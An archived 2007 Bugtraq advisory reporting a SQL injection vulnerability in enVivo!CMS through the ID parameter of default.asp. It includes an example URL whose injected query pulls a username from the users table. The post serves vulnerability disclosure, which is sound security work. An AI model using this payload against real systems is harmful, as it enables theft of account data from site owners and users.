Hosting Provided By

durito: enVivo!CMS SQL injection

From: 3APA3A <3APA3A(at)SECURITY.NNOV.RU>
Date: Wed Jul 11 2007 - 04:29:32 EDT

Dear bugtraq@securityfocus.com,

durito [damagelab] -durito[at]mail[dot]ru- reported SQL injection vulnerability in enVivo!CMS through ID parameter of default.asp.

Example:

http://www.example.com/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)--

Original message (in Russian): http://securityvulns.ru/Rdocument425.html

-- 
http://securityvulns.com/
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/

Received on Wed Jul 11 10:15:22 2007

This message: [ Message body ]
Next message: Kees Cook: "[USN-482-1] OpenOffice.org vulnerability"
Previous message: Brett Moore: "SUN Java JNLP Overflow"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Thu Aug 09 2007 - 17:55:42 EDT